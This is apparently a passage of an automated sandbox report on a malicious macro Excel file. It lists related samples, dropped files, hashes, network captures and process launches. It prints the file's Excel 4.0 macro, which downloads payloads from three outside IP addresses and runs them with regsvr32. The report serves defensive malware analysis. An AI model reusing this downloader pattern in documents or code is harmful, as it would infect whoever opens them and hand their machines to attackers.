                Rebate_1963763550_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                Rebate_1963763550_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                Rebate_234359500_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                Rebate_234359500_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                banUwVSwBY.xlsxGet hashmaliciousBrowse
                • 190.14.37.134
                banUwVSwBY.xlsxGet hashmaliciousBrowse
                • 190.14.37.134
                Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
                • 190.14.37.102
                Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
                • 190.14.37.102
                HSAEPermission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120
                Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120
                Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120
                Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120
                Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                • 185.117.73.74
                Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                • 185.117.73.74
                xa6FEoUw0W.dllGet hashmaliciousBrowse
                • 188.116.36.211
                tszs3mwUbe.exeGet hashmaliciousBrowse
                • 185.45.193.29
                pZ50mMKSLi.exeGet hashmaliciousBrowse
                • 185.45.193.29
                qTnwCotzR9.exeGet hashmaliciousBrowse
                • 185.45.193.29
                PwBsqWQ7jJ.exeGet hashmaliciousBrowse
                • 185.45.193.29
                aGDehjYIws.exeGet hashmaliciousBrowse
                • 185.198.57.204
                Tjhsm8p85Y.exeGet hashmaliciousBrowse
                • 185.45.193.29
                T23HJFoN2Y.exeGet hashmaliciousBrowse
                • 185.45.193.29
                i7NsO9mhTD.exeGet hashmaliciousBrowse
                • 185.45.193.29
                o7w2HSi17V.exeGet hashmaliciousBrowse
                • 185.141.27.225
                AB1CEF822F66D7B77574A21C8154D4A6E9FCD196A6659.exeGet hashmaliciousBrowse
                • 185.198.57.204
                4cDyOofgzT.xlsmGet hashmaliciousBrowse
                • 194.36.189.154

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83F8E7CF.jpg
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:[TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2021:02:11 21:11:18], baseline, precision 8, 1860x1000, frames 3
                Category:dropped
                Size (bytes):139381
                Entropy (8bit):7.677272725029824
                Encrypted:false
                SSDEEP:3072:CmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOy:54P4346PgZw9gQat
                MD5:53918FB868F1540920FC189C6783FC7C
                SHA1:135CB103C5B5125C80285A83AE728B559313BADC
                SHA-256:7F6AD5212338A6586251AEF92D2543AA8E70C815FE0BF7ADDCE2C0A83D20A0B3
                SHA-512:31391EFC3D377EA32A537EF3DDCA41ABAF34C4C83CDFEF9A64D40DE219B88A293BE2BF01D6A5D2B23365513CB880020F37CA8E90506C41FB7FC8E42D4D641F51
                Malicious:false
                Reputation:low
                Preview: ....!jExif..MM.*.............................b...........j.(...........1.........r.2...........i...............-....'..-....'.Adobe Photoshop CS6 (Windows).2021:02:11 21:11:18..........................D.......................................................&.(................................ 4.......H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch....
                C:\Users\user\AppData\Local\Temp\61CE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):153114
                Entropy (8bit):7.6645083416981485
                Encrypted:false
                SSDEEP:3072:cnxmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZO47t:cng4P4346PgZw9gQaB
                MD5:A426D91D65BBCD487AF2F9E280AF5CEE
                SHA1:69D0B820345DDFB4D58303F0EE5F82587B508033
                SHA-256:CDDC896ADF6465D4DD80B866469BE3197816C6E1FC1174394DB546DB35306890
                SHA-512:E39CC235BB3E9142B77872E793072EE4B8BF06C31B2ABC29AEA4B75AC2EB22B6F0296620DD73FCFFFE5D394516517BF04CDB7320042462BFF5D2C0FCCF6AD545
                Malicious:false
                Reputation:low
                Preview: ...N.0...+....(q.V...X8......41.?y..o..dw..i.{i..3....x..+k.7.....E5a.8.vM.~=..Y.I8%.wP.5 ...}.>..`A..k..~p...+.....,|.".mlx.r)........%p.L...M..B..T...F.\;V.l~.Q5.!.-E"....H...-Ay.j.u.!.P..$k..5....D......A..*..a........r......i..|..d...`...G....._....r...:..iZ,a%.T]d..2.['..hMh.a....D.].N@../9...I.x@G.{................B...&z..w.....@......L..4.".".zJt`4_.....:T..Y..~.|..F.\)..i........tz?F...D...>N.\].j.1i...}GWO..2..3s ./.j..w.r........PK..........!...&n....o.......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Jun 26 00:42:34 2021, atime=Sat Jun 26 00:42:34 2021, length=12288, window=hide
                Category:dropped
                Size (bytes):867
                Entropy (8bit):4.488589526252961
                Encrypted:false
                SSDEEP:12:85QO70LgXg/XAlCPCHaX7B8NB/rGX+WnicvbjbDtZ3YilMMEpxRljKfkcTdJP9TK:85pi/XTr6N0YebDv3qekwrNru/
                MD5:3008017780C977F34B7CC0E9613E89A6
                SHA1:E456406E7E0AE898CF5CAA11EEE3BE25ABEDFC73
                SHA-256:38B2995A29A84AA669E2E268B0B288EAD988E676B526E7453FF088159DCE19AD
                SHA-512:224E4F09CE7016C34AF43F2462F74797726D0ACFF19EA5D60C9381316FA315305EED01EA0A4B9D4B34D54D9412F67BAF82CF670A1062E9896132E97DE7B05724
                Malicious:false
                Reputation:low
                Preview: L..................F...........7G......,j......,j...0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......RR...Desktop.d......QK.X.RR.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\609290\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......609290..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Permission-40776837-06252021.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:11 2020, mtime=Sat Jun 26 00:42:34 2021, atime=Sat Jun 26 00:42:34 2021, length=153114, window=hide
                Category:dropped
                Size (bytes):2218
                Entropy (8bit):4.539188552481485
                Encrypted:false
                SSDEEP:48:8+T/XT+NnQV967l968ekwQh2+T/XT+NnQV967l968ekwQ/:8+T/X6NnYQze3Qh2+T/X6NnYQze3Q/
                MD5:7CE118B8EECE06D2E6600A46863DEAA0
                SHA1:A93B121CA1C54F39A87E51526453F7B3A7970D46
                SHA-256:539C4EEC9B08D46AC445AF735AAC4E8B5899AFF78C35671A269439895B424530
                SHA-512:AD70E748DC34768BF8F5E97E267182BC65A721D20CE550F39EEDE538E50F5E7BAEE57F6834873B8C7A170BE4247E0B33DEE0FD6DEFE0B3B4D63AE5E8D98AFA25
                Malicious:false
                Reputation:low
                Preview: L..................F.... ........{......,j..u...,j...V...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..X...RO. .PERMIS~1.XLS..p.......Q.y.Q.y*...8.....................P.e.r.m.i.s.s.i.o.n.-.4.0.7.7.6.8.3.7.-.0.6.2.5.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\609290\Users.user\Desktop\Permission-40776837-06252021.xlsm.8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.e.r.m.i.s.s.i.o.n.-.4.0.7.7.6.8.3.7.-.0.6.2.5.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):139
                Entropy (8bit):4.73490127499812
                Encrypted:false
                SSDEEP:3:oyBVomxW+LxtTUSOX9UltLxtTUSOX9UlmxW+LxtTUSOX9Ulv:djHxO2/FxO2axO21
                MD5:DD807AE46DE66166FF8C2A5A2720329A
                SHA1:8F5E6BB049C86C267E546D071C0609561CAD3B8A
                SHA-256:97715C735644785465C596B1613D156B28E027F87CCA5FDCE747E9BFF9B6D0DC
                SHA-512:137575026C181CA5A11BE9DF209B9BC57D24D31C80C7C2B19088068AC7B67B5CAC88BF670AE6281F9C1212F5AFD6E8FA27D8ED5C3AE8C1DD5C6AB10F4BEC1FCD
                Malicious:false
                Reputation:low
                Preview: Desktop.LNK=0..[misc]..Permission-40776837-06252021.LNK=0..Permission-40776837-06252021.LNK=0..[misc]..Permission-40776837-06252021.LNK=0..
                C:\Users\user\Desktop\02CE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):153114
                Entropy (8bit):7.6645083416981485
                Encrypted:false
                SSDEEP:3072:cnxmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZO47t:cng4P4346PgZw9gQaB
                MD5:A426D91D65BBCD487AF2F9E280AF5CEE
                SHA1:69D0B820345DDFB4D58303F0EE5F82587B508033
                SHA-256:CDDC896ADF6465D4DD80B866469BE3197816C6E1FC1174394DB546DB35306890
                SHA-512:E39CC235BB3E9142B77872E793072EE4B8BF06C31B2ABC29AEA4B75AC2EB22B6F0296620DD73FCFFFE5D394516517BF04CDB7320042462BFF5D2C0FCCF6AD545
                Malicious:false
                Reputation:low
                Preview: ...N.0...+....(q.V...X8......41.?y..o..dw..i.{i..3....x..+k.7.....E5a.8.vM.~=..Y.I8%.wP.5 ...}.>..`A..k..~p...+.....,|.".mlx.r)........%p.L...M..B..T...F.\;V.l~.Q5.!.-E"....H...-Ay.j.u.!.P..$k..5....D......A..*..a........r......i..|..d...`...G....._....r...:..iZ,a%.T]d..2.['..hMh.a....D.].N@../9...I.x@G.{................B...&z..w.....@......L..4.".".zJt`4_.....:T..Y..~.|..F.\)..i........tz?F...D...>N.\].j.1i...}GWO..2..3s ./.j..w.r........PK..........!...&n....o.......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\Desktop\~$Permission-40776837-06252021.xlsm
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):330
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                MD5:96114D75E30EBD26B572C1FC83D1D02E
                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                Malicious:true
                Reputation:high, very likely benign file
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                Static File Info

                General

                File type:Microsoft Excel 2007+
                Entropy (8bit):7.666398010242972
                TrID:
                • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                • ZIP compressed archive (8000/1) 16.67%
                File name:Permission-40776837-06252021.xlsm
                File size:153750
                MD5:2cd2fd004b5589a595239f202ac648ae
                SHA1:ac02da8a953fd89f325c64bf5df93e415350ec12
                SHA256:ad3071800cd6852215e7ffcc6c65e7104e3d6e10bccfffc8249d73be0512d6dd
                SHA512:6cac4bb0573617012f4dbfe93fec4c18c824be4b452407a09af5b46d88326e24d828b5a4eea9b762c687a1fd6b98de8235ff9bad418313a00d9e6e36c38ffe8a
                SSDEEP:3072:QmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOYJ:P4P4346PgZw9gQaVJ
                File Content Preview:PK..........!.........o.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                File Icon

                Icon Hash:e4e2aa8aa4bcbcac

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:1

                OLE File "Permission-40776837-06252021.xlsm"

                Indicators

                Has Summary Info:
                Application Name:
                Encrypted Document:
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:

                Macro 4.0 Code

                ,=NOW()&H8,.dat,,,,,,,"=REGISTER(Sheet2!O12,Sheet2!O13,Sheet2!O14,Sheet2!O15,,1,9)","=""http://185.240.103.219/""","=Jerutyg(0,F13&G8,""..\Kro.fis"",0,0)","=""http://190.14.37.3/""","=Jerutyg(0,F14&G8,""..\Kro.fis1"",0,0)","=""http://185.183.99.120/""","=Jerutyg(0,F15&G8,""..\Kro.fis2"",0,0)",,,,,,,,,,,,,,,,,,,,=RUN(Sheet4!I9),
                =EXEC(Sheet2!O22)"=EXEC(Sheet2!O22&""1"")""=EXEC(Sheet2!O22&""2"")"=HALT()

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                06/25/21-18:43:10.505432ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
                06/25/21-18:43:13.515728ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
                06/25/21-18:43:19.735650ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
                06/25/21-18:43:32.155929ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
                06/25/21-18:43:35.295940ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
                06/25/21-18:43:41.478686ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
                06/25/21-18:43:52.235681TCP1201ATTACK-RESPONSES 403 Forbidden8049169185.183.99.120192.168.2.22

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jun 25, 2021 18:43:07.261714935 CEST4916580192.168.2.22185.240.103.219
                Jun 25, 2021 18:43:07.347479105 CEST8049165185.240.103.219192.168.2.22
                Jun 25, 2021 18:43:07.843693972 CEST4916580192.168.2.22185.240.103.219
                Jun 25, 2021 18:43:07.935241938 CEST8049165185.240.103.219192.168.2.22
                Jun 25, 2021 18:43:08.436453104 CEST4916580192.168.2.22185.240.103.219
                Jun 25, 2021 18:43:08.528072119 CEST8049165185.240.103.219192.168.2.22
                Jun 25, 2021 18:43:08.531131029 CEST4916680192.168.2.22185.240.103.219
                Jun 25, 2021 18:43:08.622881889 CEST8049166185.240.103.219192.168.2.22
                Jun 25, 2021 18:43:09.122951031 CEST4916680192.168.2.22185.240.103.219
                Jun 25, 2021 18:43:09.213090897 CEST8049166185.240.103.219192.168.2.22
                Jun 25, 2021 18:43:09.716026068 CEST4916680192.168.2.22185.240.103.219
                Jun 25, 2021 18:43:09.806054115 CEST8049166185.240.103.219192.168.2.22
                Jun 25, 2021 18:43:09.828479052 CEST4916780192.168.2.22190.14.37.3
                Jun 25, 2021 18:43:12.820528030 CEST4916780192.168.2.22190.14.37.3
                Jun 25, 2021 18:43:18.827099085 CEST4916780192.168.2.22190.14.37.3
                Jun 25, 2021 18:43:30.827013969 CEST4916880192.168.2.22190.14.37.3
                Jun 25, 2021 18:43:33.835673094 CEST4916880192.168.2.22190.14.37.3
                Jun 25, 2021 18:43:39.842207909 CEST4916880192.168.2.22190.14.37.3
                Jun 25, 2021 18:43:51.888657093 CEST4916980192.168.2.22185.183.99.120
                Jun 25, 2021 18:43:51.954787970 CEST8049169185.183.99.120192.168.2.22
                Jun 25, 2021 18:43:51.954951048 CEST4916980192.168.2.22185.183.99.120
                Jun 25, 2021 18:43:51.955588102 CEST4916980192.168.2.22185.183.99.120
                Jun 25, 2021 18:43:52.021440983 CEST8049169185.183.99.120192.168.2.22
                Jun 25, 2021 18:43:52.235681057 CEST8049169185.183.99.120192.168.2.22
                Jun 25, 2021 18:43:52.235918999 CEST4916980192.168.2.22185.183.99.120
                Jun 25, 2021 18:44:57.235600948 CEST8049169185.183.99.120192.168.2.22
                Jun 25, 2021 18:44:57.237277985 CEST4916980192.168.2.22185.183.99.120
                Jun 25, 2021 18:45:04.865314007 CEST4916980192.168.2.22185.183.99.120
                Jun 25, 2021 18:45:04.931340933 CEST8049169185.183.99.120192.168.2.22

                HTTP Request Dependency Graph

                • 185.183.99.120

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.2249169185.183.99.12080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Jun 25, 2021 18:43:51.955588102 CEST2OUTGET /44372.7795725694.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 185.183.99.120
                Connection: Keep-Alive
                Jun 25, 2021 18:43:52.235681057 CEST2INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Fri, 25 Jun 2021 16:44:07 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Code Manipulations

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:18:42:32
                Start date:25/06/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13f3f0000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:43:20
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis
                Imagebase:0xff430000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:43:20
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis1
                Imagebase:0xff430000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:43:21
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis2
                Imagebase:0xff430000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >